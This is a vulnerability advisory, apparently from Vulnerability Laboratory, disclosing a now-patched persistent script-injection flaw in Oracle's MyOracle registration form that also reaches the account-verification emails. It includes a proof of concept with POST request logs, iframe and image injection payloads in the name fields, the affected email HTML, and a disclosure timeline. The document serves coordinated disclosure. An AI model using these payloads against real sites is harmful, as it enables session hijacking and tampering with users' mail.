Oracle Corporation fixed Vulnerability in MyOracle Online-Service Application

Persistent Vulnerability discovered in the MyOracle Application

Today the oracle security alert team allowed the vulnerability laboratory to discover an application-side vulnerability in the well known MyOracle web-service. The MyOracle online-service provides an user account profile after registration and is connected to the official Oracle Corporation support website. The MyOracle account can be accessed through several portals of the oracle community. Once registered you can access the connected services to interaction as client or customer of the company. The issue has been reported in april 2014 and has been patched since september 2014. The issue that has been disclosed was reported by the security researcher and company ceo benjamin kunz mejri to the oracle corporation.

The vulnerability was located in the name values of the my-oracle `registration` module. Remote attackers are able to inject in the first and lastname input fields of the registration formular own script codes via POST method request. The injected script code activates the account mail service notification which returns with the persistent code in the myoracle token activation site. The issue impact a critical risk because an attacker is able to inject own tokens or can manipulate the full mail body context. Further send notification mails by the myoracle service can also be affected by the issue. The encoding of the server does not recognize outgoing service mails which results in the persistent issue in outgoing emails. The injection point is a profile values update or directly the remote registration itself.

The security risk of the persistent mail encoding and filter web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent session hijacking attacks, unauthorized external redirects to malicious sources and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] MyOracle

Vulnerable Module(s):
[+] Registration (exp.)

Vulnerable Parameter(s):
[+] Profile name values (firstname & lastname ...)

[Sender]:
[+] oracle-acct_ww@oracle.com

[Receiver]:
[+] admin@evolution-sec.com & bkm@evolution-sec.com

Proof of Concept (PoC):
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without privileged application user account. For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com

Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com

Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?n...

Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU...

After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextU...

-- PoC Session Logs [POST] ---

Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU...

7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D771476

6E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DF

FC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C4419390

8907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU...
      Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0; s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_i... atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST-Daten:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextU...
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]
 

PoC: Exploitcode in Mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset... alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jsp... color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jsp... wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset... alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>

Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">

Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU...
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken

Time Line:

2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1261